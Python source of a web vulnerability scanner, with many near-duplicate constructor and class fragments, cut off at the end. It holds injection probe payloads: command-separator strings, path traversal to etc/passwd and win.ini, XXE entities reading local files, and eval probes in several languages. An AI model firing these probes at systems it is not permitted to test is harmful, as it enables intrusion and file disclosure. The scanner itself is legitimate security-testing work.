def __init__(self, kb, logger, thread_num, cookie):
    """Set up the open-redirect scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of worker threads
    :cookie: cookie string sent with requests
    """
    super(UrlRedirect, self).__init__()
    self.owner = 'UrlRedirect'
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Redirect targets used as probe payloads.
    self.payloads = ['http://www.baidu.com/', '//baidu.com']
    # Thread dispatcher that fans tasks out to the workers.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_url_redirect,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the reflected/stored XSS scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of threads
    :cookie: cookie
    """
    super(ReflectedXss, self).__init__()
    self.owner = 'ReflectedXss'
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Payloads with their random markers already substituted in.
    self.payloads = [replace_randomize(raw) for raw in PAYLOADS]
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_reflected_xss,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, phantomjs_path, evaljs_path, logger, thread_num,
             filetype_whitelist, depth_limit, temp_dir_path):
    """Set up the page-source downloader.

    :kb: Universal KnowledgeBase
    :phantomjs_path: path to the phantomjs binary
    :evaljs_path: path to the evaluation JS script
    :logger: output logger
    :thread_num: maximum number of threads
    :filetype_whitelist: file-type whitelist
    :depth_limit: crawl depth limit
    :temp_dir_path: temporary directory
    """
    super(SrcDownloader, self).__init__()
    self.kb = kb
    self.logger = logger
    # Command prefix "<phantomjs> <evaljs> " -- the trailing space is
    # preserved deliberately (original used ' '.join([..., ''])).
    self.executable = '%s %s ' % (phantomjs_path, evaljs_path)
    self.filetype_whitelist = filetype_whitelist
    self.depth_limit = depth_limit
    self.temp_dir_path = temp_dir_path
    self.exit_flag = False
    self.task_queue = []
    self.seconds_wait = 1  # poll interval for newly discovered URLs
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.download_page,
        logger=self.logger,
        owner='Downloader',
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the command-execution scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(CMDExec, self).__init__()
    self.owner = 'CMDExec'
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_cmd_exec,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # Command separators crossed with probe commands.
    separators = ['', ';', '|']
    commands = [
        'ping -c 20 127.0.0.1',
        'ping -n 20 127.0.0.1',
        'echo 123456789098765432345678'
    ]
    self.results = ['123456789098765432345678']
    self.payloads = [sep + cmd for sep in separators for cmd in commands]
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the DOM-XSS scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of threads
    :cookie: cookie
    """
    super(DomXss, self).__init__()
    self.owner = 'DomXss'
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.task_queue = []
    self.visited = {}  # pages/scripts already fetched
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_dom_xss,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the information-leakage scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(INFOLeakage, self).__init__()
    self.owner = 'INFOLeakage'
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_INFO_LEAKAGE,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # pathlist is defined elsewhere; it is indexed like a dict
    # (path -> expected response marker) by the analyzer.
    self.payloads = pathlist
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the LFI/XXE scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(LFIScanner, self).__init__()
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    self.owner = 'LFIScanner'
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_lfi,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # Traversal prefix x target file x suffix tricks (null byte, %00, ...).
    heads = ['../' * 16]
    self.bodys = ['etc/passwd', 'windows/win.ini']
    tails = ['', '\0', '%00', '?', '/' + './' * 2048]
    self.payloads = [
        ''.join([a, b, c]) for a in heads for b in self.bodys for c in tails
    ]
    # Two XXE payloads; detection works the same way as for the LFI bodies.
    # BUGFIX: the win.ini payload was missing the closing '"' of its
    # SYSTEM identifier, producing malformed XML no parser would resolve.
    temp = [
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini">]><foo>&xxe;</foo>'
    ]
    self.payloads.extend(temp)
    self.bodys.extend(temp)
    # One compiled result regex per entry in self.bodys, same order.
    results = [
        r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*',
        r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*'
    ]
    self.results = [
        re.compile(rgx, re.DOTALL | re.IGNORECASE) for rgx in results
    ]
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the command-execution scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(CMDExec, self).__init__()
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.owner = 'CMDExec'
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_cmd_exec,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # Probe payloads: every separator combined with every command.
    prefixes = ['', ';', '|']
    probes = [
        'ping -c 20 127.0.0.1',
        'ping -n 20 127.0.0.1',
        'echo 123456789098765432345678'
    ]
    self.results = ['123456789098765432345678']
    self.payloads = [p + c for p in prefixes for c in probes]
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the information-leakage scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(INFOLeakage, self).__init__()
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.owner = 'INFOLeakage'
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_INFO_LEAKAGE,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # Probe paths (defined elsewhere as pathlist).
    self.payloads = pathlist
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the DOM-XSS scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of threads
    :cookie: cookie
    """
    super(DomXss, self).__init__()
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.owner = 'DomXss'
    self.task_queue = []
    self.visited = {}  # de-duplicates fetched script URLs
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher feeding check_on_dom_xss workers.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_dom_xss,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the URL-redirect scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of threads
    :cookie: cookie
    """
    super(UrlRedirect, self).__init__()
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.owner = 'UrlRedirect'
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # External URLs the target should never redirect to on its own.
    probe_targets = ['http://www.baidu.com/', '//baidu.com']
    self.payloads = probe_targets
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_url_redirect,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, sqlmapapi_path, sqlmapapi_port, logger, cookie,
             sqlmapapi_addr, thread_num, temp_dir_path):
    """Set up the SQL-injection scanner backed by sqlmapapi.

    :kb: Universal KnowledgeBase
    :sqlmapapi_path: path to the sqlmapapi script
    :sqlmapapi_port: port the API server listens on
    :sqlmapapi_addr: listen address, localhost by default
    :logger: output logger
    :cookie: cookie, empty by default
    :thread_num: maximum number of threads
    :temp_dir_path: temporary directory
    """
    super(SqlScanner, self).__init__()
    self.kb = kb
    self.logger = logger
    self.cookie = cookie
    self.temp_dir_path = temp_dir_path
    self.task_queue = []
    self.seconds_wait = 2  # poll interval for newly arrived URLs
    self.sqlmapapi_process = None
    self.exit_flag = False
    self.sqlmapapi_server = 'http://%s:%s' % (sqlmapapi_addr, sqlmapapi_port)
    # One AutoSqli slot per worker thread, guarded by a lock.
    self.autosqli_list = [None] * thread_num
    self.autosqli_list_mutex = threading.Lock()
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_sql_injection,
        logger=self.logger,
        owner='SqlScanner',
        start_index=0,
        seconds_wait=1)
    # Launch the sqlmapapi server.
    self.start_sqlmapapi_server(sqlmapapi_path, sqlmapapi_addr,
                                sqlmapapi_port)
def __init__(self, kb, logger, thread_num, cookie):
    """Set up the code-execution scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(CODEExec, self).__init__()
    self.owner = 'CODEExec'
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_CODE_exec,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    repeats = 5
    # One eval probe per target language; each prints '%s' five times.
    self.payloads = (
        # PHP http://php.net/eval
        "echo str_repeat('%%s',%s);" % repeats,
        # Perl http://perldoc.perl.org/functions/eval.html
        "print '%%s'x%s" % repeats,
        # Python
        # http://docs.python.org/reference/simple_stmts.html#the-exec-statement
        "print '%%s'*%s" % repeats,
        # ASP
        "Response.Write(new String(\"%%s\",%s))" % repeats,
    )
def __init__(self, kb, thread_num, dic_paths, logger):
    """Set up the directory brute-forcer.

    :kb: Universal KnowledgeBase
    :thread_num: number of worker threads
    :dic_paths: list of wordlist file paths
    :logger: output logger
    """
    super(DirBurster, self).__init__()
    # Silence HTTPS certificate warnings from urllib3.
    requests.packages.urllib3.disable_warnings()
    self.kb = kb
    self.logger = logger
    # Load the wordlists; `with` closes each file handle
    # (the original open(...).readlines() leaked them).
    self.dic = []
    for file_path in dic_paths:
        with open(file_path, 'r') as dic_file:
            self.dic.extend(dic_file.readlines())
    # Original [1:-1] trim preserved: drops the trailing newline AND the
    # first character of each entry.
    # NOTE(review): confirm the wordlist really carries a junk leading
    # character; otherwise this should be line.rstrip('\n').
    self.dic = [line[1:-1] for line in self.dic]
    self.exit_flag = False
    self.visited_mutex = threading.Lock()
    self.task_queue = []
    self.visited = {}
    self.seconds_wait = 2
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.burst_url,
        logger=self.logger,
        owner='DirBurster',
        start_index=0,
        seconds_wait=2)
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the code-execution scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(CODEExec, self).__init__()
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.owner = 'CODEExec'
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_CODE_exec,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    echo_count = 5
    # Language-specific eval probes; a hit echoes '%s' echo_count times.
    self.payloads = (
        # PHP http://php.net/eval
        "echo str_repeat('%%s',%s);" % echo_count,
        # Perl http://perldoc.perl.org/functions/eval.html
        "print '%%s'x%s" % echo_count,
        # Python
        # http://docs.python.org/reference/simple_stmts.html#the-exec-statement
        "print '%%s'*%s" % echo_count,
        # ASP
        "Response.Write(new String(\"%%s\",%s))" % echo_count,
    )
def __init__(self, kb, logger, thread_num, cookie):
    """Initialize the LFI/XXE scanner.

    :kb: Universal KnowledgeBase
    :logger: output logger
    :thread_num: number of scan threads
    :cookie: cookie
    """
    super(LFIScanner, self).__init__()
    self.kb = kb
    self.cookie = cookie
    self.logger = logger
    self.task_queue = []
    self.seconds_wait = 2
    self.exit_flag = False
    self.owner = 'LFIScanner'
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.check_on_lfi,
        logger=self.logger,
        owner=self.owner,
        start_index=0,
        seconds_wait=2)
    # Traversal prefix x target file x suffix tricks.
    heads = ['../' * 16]
    self.bodys = ['etc/passwd', 'windows/win.ini']
    tails = ['', '\0', '%00', '?', '/' + './' * 2048]
    self.payloads = [''.join([a, b, c])
                     for a in heads
                     for b in self.bodys
                     for c in tails]
    # Two XXE payloads; detected the same way as the LFI bodies.
    # BUGFIX: the win.ini payload's SYSTEM identifier lacked its closing
    # '"', making the XML malformed (compare the /etc/passwd payload).
    temp = ['<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini">]><foo>&xxe;</foo>']
    self.payloads.extend(temp)
    self.bodys.extend(temp)
    # One compiled result regex per entry in self.bodys, same order.
    results = [
        r'.*root:[^\n]*:/bin/sh.*',
        r'.*\[extensions\].*',
        r'.*root:[^\n]*:/bin/sh.*',
        r'.*\[extensions\].*']
    self.results = [re.compile(rgx, re.DOTALL | re.IGNORECASE)
                    for rgx in results]
def __init__(self, kb, thread_num, dic_paths, logger):
    """Initialize the directory brute-forcer.

    :kb: Universal KnowledgeBase
    :thread_num: number of worker threads
    :dic_paths: list of wordlist file paths
    :logger: output logger
    """
    super(DirBurster, self).__init__()
    # Silence HTTPS certificate warnings from urllib3.
    requests.packages.urllib3.disable_warnings()
    self.kb = kb
    self.logger = logger
    # Read the wordlists with `with` so the file handles are closed
    # (the original open(...).readlines() leaked them).
    self.dic = []
    for file_path in dic_paths:
        with open(file_path, 'r') as dic_file:
            self.dic.extend(dic_file.readlines())
    # Original [1:-1] trim preserved: drops the trailing newline AND the
    # first character of each entry.
    # NOTE(review): verify the wordlist format expects that leading
    # character to be discarded; otherwise use line.rstrip('\n').
    self.dic = [entry[1:-1] for entry in self.dic]
    self.exit_flag = False
    self.visited_mutex = threading.Lock()
    self.task_queue = []
    self.visited = {}
    self.seconds_wait = 2
    # Thread dispatcher.
    self.dispather = ParallelDispatcher(
        thread_num=thread_num,
        data_source=self.task_queue,
        execute_func=self.burst_url,
        logger=self.logger,
        owner='DirBurster',
        start_index=0,
        seconds_wait=2)
class DirBurster(object):
    """Directory brute-forcer; runs in its own thread."""

    def __init__(self, kb, thread_num, dic_paths, logger):
        """
        :kb: Universal KnowledgeBase
        :thread_num: number of worker threads
        :dic_paths: list of wordlist file paths
        :logger: output logger
        """
        super(DirBurster, self).__init__()
        # Silence HTTPS certificate warnings from urllib3.
        requests.packages.urllib3.disable_warnings()
        self.kb = kb
        self.logger = logger
        # Load the wordlists; `with` closes each file handle
        # (the original open(...).readlines() leaked them).
        self.dic = []
        for file_path in dic_paths:
            with open(file_path, 'r') as dic_file:
                self.dic.extend(dic_file.readlines())
        # Original [1:-1] trim preserved: drops the trailing newline AND
        # the first character of each entry.
        # NOTE(review): confirm the wordlist really carries a junk leading
        # character; otherwise this should be line.rstrip('\n').
        self.dic = [line[1:-1] for line in self.dic]
        self.exit_flag = False
        self.visited_mutex = threading.Lock()
        self.task_queue = []
        self.visited = {}
        self.seconds_wait = 2
        # Thread dispatcher fanning URLs out to burst_url workers.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.burst_url,
            logger=self.logger,
            owner='DirBurster',
            start_index=0,
            seconds_wait=2)

    def engine_start(self):
        """Main loop: pull URLs from the KB and brute-force directories."""
        self.log(['Engine started.'])
        url_count = 0
        while True:
            # Read a batch; None means the source is exhausted.
            results = self.kb.read_data(URL, DIR_BURSTER, url_count)
            if results is None:
                break
            # Queue the new URLs and let the dispatcher hand them out.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result[0] for result in results])
                self.dispather.dispath_scan_task()
            # Stop as soon as the exit flag is raised.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for all worker threads to finish.
        self.dispather.suicide()
        self.log(['Engine stopped.'])

    def burst_url(self, url, thread_no):
        """Worker: brute-force directories of one URL and store hits.

        :url: target URL
        :thread_no: worker thread index
        """
        path, domain = extract_path_domain(url)
        # Collect every successfully guessed directory and persist it.
        urls = self.parse_path(path, domain)
        self.kb.save_data(URL, [(url, 0, 200, 0) for url in urls])

    def parse_path(self, path, domain):
        """Recursively brute-force *path* and every ancestor of it.

        :path: current path component
        :domain: current domain
        :return: list of guessed URLs that answered 200
        """
        if len(path) == 0:
            return []
        # Skip paths that were already visited; mark new ones.
        full_path = domain + path
        self.visited_mutex.acquire()
        if self.visited.get(full_path) is not None:
            self.visited_mutex.release()
            return []
        self.visited[full_path] = 0
        self.visited_mutex.release()
        # Strip one directory level and recurse upwards first.
        upper = path[0:-1]
        i = upper.rfind('/')
        if i == -1:
            upper = ''
        else:
            upper = upper[0:i + 1]
        u_list = self.parse_path(upper, domain)
        u_list.extend(self.burst_single(full_path))
        return u_list

    def burst_single(self, url):
        """Try every wordlist entry under *url*.

        :url: base path
        :return: list of URLs that answered 200
        """
        u_list = []
        for x in self.dic:
            if self.exit_flag:
                break
            if self.head_request(url + x):
                u_list.append(url + x)
        return u_list

    def head_request(self, url):
        """HEAD-probe *url*; currently only the status code is checked."""
        try:
            found = requests.head(url, verify=False).status_code == 200
        except Exception:
            # Treat any failure as "not found". Narrowed from a bare
            # except, which also swallowed KeyboardInterrupt/SystemExit.
            found = False
        return found

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs):
        self.logger.debug('DirBurster', msgs)
class CODEExec(object):
    """Code-execution scanner: probes KB targets and stores findings."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scan threads
        :cookie: cookie
        """
        super(CODEExec, self).__init__()
        self.owner = 'CODEExec'
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Thread dispatcher.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_CODE_exec,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2)
        repeats = 5
        # One eval probe per target language; each prints '%s' five times.
        self.payloads = (
            # PHP http://php.net/eval
            "echo str_repeat('%%s',%s);" % repeats,
            # Perl http://perldoc.perl.org/functions/eval.html
            "print '%%s'x%s" % repeats,
            # Python
            # http://docs.python.org/reference/simple_stmts.html#the-exec-statement
            "print '%%s'*%s" % repeats,
            # ASP
            "Response.Write(new String(\"%%s\",%s))" % repeats,
        )

    def engine_start(self):
        """Main loop: pull URLs from the KB and test them."""
        self.log(['Engine started.'], DEBUG)
        url_count = 0
        while True:
            # None means every record has been consumed.
            results = self.kb.read_data(URL, CODE_EXEC, url_count)
            if results is None:
                break
            # Only POST (2) and parameterized GET (1) targets are queued.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(
                    [r for r in results if r[1] in (1, 2)])
                self.dispather.dispath_scan_task()
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Shut the worker threads down.
        self.dispather.suicide()
        self.log(['Engine stopped.'], DEBUG)

    def check_on_CODE_exec(self, task, thread_no):
        """Worker: probe a single URL for code execution.

        :task: (url, is_post, code, depth) tuple
        :thread_no: worker thread index
        """
        url, query = extract_path_query(task[0])
        is_post = task[1]
        # Try each payload in turn; stop at the first hit.
        for payload in self.payloads:
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                break
            # Send the payload and learn which parameter triggered it.
            index = send_payload(url, is_post, query, payload,
                                 self.analyze_CODE_result, self.cookie)
            if index == -1:
                continue
            # Report and persist the finding.
            self.log([
                '[VULNERABLE] ' + task[0],
                ' [LOCATION] ' + query[index][0],
                ' [PAYLOAD] ' + payload
            ], not DEBUG)
            self.kb.save_data(CODE,
                              (task[0], query[index][0], payload, 'CODE'))
            break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_CODE_result(self, payload, src, ori_time):
        """True when the page echoed five consecutive '%s' markers."""
        return '%s%s%s%s%s' in src

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class DirBurster(object):
    """Directory brute-forcer; runs in its own thread."""

    def __init__(self, kb, thread_num, dic_paths, logger):
        """
        :kb: Universal KnowledgeBase
        :thread_num: number of worker threads
        :dic_paths: list of wordlist file paths
        :logger: output logger
        """
        super(DirBurster, self).__init__()
        # Silence HTTPS certificate warnings from urllib3.
        requests.packages.urllib3.disable_warnings()
        self.kb = kb
        self.logger = logger
        # Read the wordlists with `with` so every handle is closed
        # (the original open(...).readlines() leaked them).
        self.dic = []
        for file_path in dic_paths:
            with open(file_path, 'r') as dic_file:
                self.dic.extend(dic_file.readlines())
        # Original [1:-1] trim preserved: drops the trailing newline AND
        # the first character of each entry.
        # NOTE(review): verify the wordlist format expects the leading
        # character to be discarded; otherwise use line.rstrip('\n').
        self.dic = [entry[1:-1] for entry in self.dic]
        self.exit_flag = False
        self.visited_mutex = threading.Lock()
        self.task_queue = []
        self.visited = {}
        self.seconds_wait = 2
        # Thread dispatcher fanning URLs out to burst_url workers.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.burst_url,
            logger=self.logger,
            owner='DirBurster',
            start_index=0,
            seconds_wait=2)

    def engine_start(self):
        """Main loop: pull URLs from the KB and brute-force directories."""
        self.log(['Engine started.'])
        url_count = 0
        while True:
            # Read a batch; None means the source is exhausted.
            results = self.kb.read_data(URL, DIR_BURSTER, url_count)
            if results is None:
                break
            # Queue the new URLs and let the dispatcher hand them out.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend([result[0] for result in results])
                self.dispather.dispath_scan_task()
            # Stop as soon as the exit flag is raised.
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        # Wait for all worker threads to finish.
        self.dispather.suicide()
        self.log(['Engine stopped.'])

    def burst_url(self, url, thread_no):
        """Worker: brute-force directories of one URL and store hits.

        :url: target URL
        :thread_no: worker thread index
        """
        path, domain = extract_path_domain(url)
        # Collect every successfully guessed directory and persist it.
        urls = self.parse_path(path, domain)
        self.kb.save_data(URL, [(url, 0, 200, 0) for url in urls])

    def parse_path(self, path, domain):
        """Recursively brute-force *path* and every ancestor of it.

        :path: current path component
        :domain: current domain
        :return: list of guessed URLs that answered 200
        """
        if len(path) == 0:
            return []
        # Skip paths that were already visited; mark new ones.
        full_path = domain + path
        self.visited_mutex.acquire()
        if self.visited.get(full_path) is not None:
            self.visited_mutex.release()
            return []
        self.visited[full_path] = 0
        self.visited_mutex.release()
        # Strip one directory level and recurse upwards first.
        upper = path[0:-1]
        i = upper.rfind('/')
        if i == -1:
            upper = ''
        else:
            upper = upper[0:i + 1]
        u_list = self.parse_path(upper, domain)
        u_list.extend(self.burst_single(full_path))
        return u_list

    def burst_single(self, url):
        """Try every wordlist entry under *url*.

        :url: base path
        :return: list of URLs that answered 200
        """
        u_list = []
        for x in self.dic:
            if self.exit_flag:
                break
            if self.head_request(url + x):
                u_list.append(url + x)
        return u_list

    def head_request(self, url):
        """HEAD-probe *url*; currently only the status code is checked."""
        try:
            found = requests.head(url, verify=False).status_code == 200
        except Exception:
            # Treat any failure as "not found". Narrowed from a bare
            # except, which also swallowed KeyboardInterrupt/SystemExit.
            found = False
        return found

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs):
        self.logger.debug('DirBurster', msgs)
class DomXss(object):
    """DOM-XSS detection: inspects pages for controllable sinks, no payloads sent."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of threads
        :cookie: cookie
        """
        super(DomXss, self).__init__()
        self.owner = 'DomXss'
        self.kb = kb
        self.logger = logger
        self.cookie = cookie
        self.task_queue = []
        self.visited = {}  # scripts already fetched
        self.seconds_wait = 2
        self.exit_flag = False
        # Thread dispatcher.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_dom_xss,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
            seconds_wait=2)

    def engine_start(self):
        """Main DOM-XSS loop: pull URLs from the KB and queue them all."""
        url_count = 0
        while True:
            results = self.kb.read_data(URL, XSS_SCANNER, url_count)
            if results is None:
                break
            # Every URL is a candidate for DOM inspection.
            if len(results) > 0:
                url_count += len(results)
                self.task_queue.extend(results)
                self.dispather.dispath_scan_task()
            if self.exit_flag:
                break
            time.sleep(self.seconds_wait)
        self.dispather.suicide()

    def check_on_dom_xss(self, task, thread_no):
        """Worker: scan one page plus every script it includes for DOM sinks.

        :task: (url, is_post, code, depth) tuple
        :thread_no: worker thread index
        """
        # Fetch the page itself, then every <script src=...> it references.
        src = {task[0]: send_common_request(task[0], task[1], self.cookie)}
        for js in _script_src_re.findall(src[task[0]]):
            if self.exit_flag:
                self.log(['Thread killed, abort on %s' % task[0]], DEBUG)
                return
            # Fetch each script once; repeats are skipped.
            # Caveat (from the original): once one source is flagged the
            # remaining ones are ignored -- acceptable, since at least one
            # finding is always reported.
            link = url_process(js, task[0])
            if self.visited.get(link) is not None:
                continue
            self.visited[link] = 0
            src[js] = send_common_request(link, 0, '')
        # Look for a controllable sink in any of the fetched sources.
        for url in src.keys():
            res = self.analyze_dom_result(src[url])
            if res is not None:
                # Report and persist the finding.
                self.log(['[VULNERABLE] ' + task[0],
                          '[FILE] ' + url,
                          '[KEYWORD] ' + res], not DEBUG)
                self.kb.save_data(XSS, (task[0], url, res, 'DOM'))
                break
        else:
            self.log(['[INVULNERABLE] ' + task[0]], DEBUG)

    def analyze_dom_result(self, response):
        """Scan *response* for user-controlled values reaching JS sinks.

        :response: page/script source code
        :return: None when clean, otherwise a '|'-joined keyword list
        """
        hits = []
        for function_re in JS_FUNCTION_CALLS:
            parameters = function_re.search(response)
            if parameters:
                for user_controlled in DOM_USER_CONTROLLED:
                    if user_controlled in parameters.groups()[0]:
                        hits.append(user_controlled)
        if hits:
            return '|'.join(hits)
        return None

    def exit(self):
        """Signal the dispatcher and the main loop to stop."""
        self.dispather.exit()
        self.exit_flag = True

    def log(self, msgs, debug):
        sink = self.logger.debug if debug else self.logger.info
        sink(self.owner, msgs)
class CMDExec(object):
    """Command-execution scanner: probes KB targets and stores findings."""

    def __init__(self, kb, logger, thread_num, cookie):
        """
        :kb: Universal KnowledgeBase
        :logger: output logger
        :thread_num: number of scan threads
        :cookie: cookie
        """
        super(CMDExec, self).__init__()
        self.owner = 'CMDExec'
        self.kb = kb
        self.cookie = cookie
        self.logger = logger
        self.task_queue = []
        self.seconds_wait = 2
        self.exit_flag = False
        # Thread dispatcher.
        self.dispather = ParallelDispatcher(
            thread_num=thread_num,
            data_source=self.task_queue,
            execute_func=self.check_on_cmd_exec,
            logger=self.logger,
            owner=self.owner,
            start_index=0,
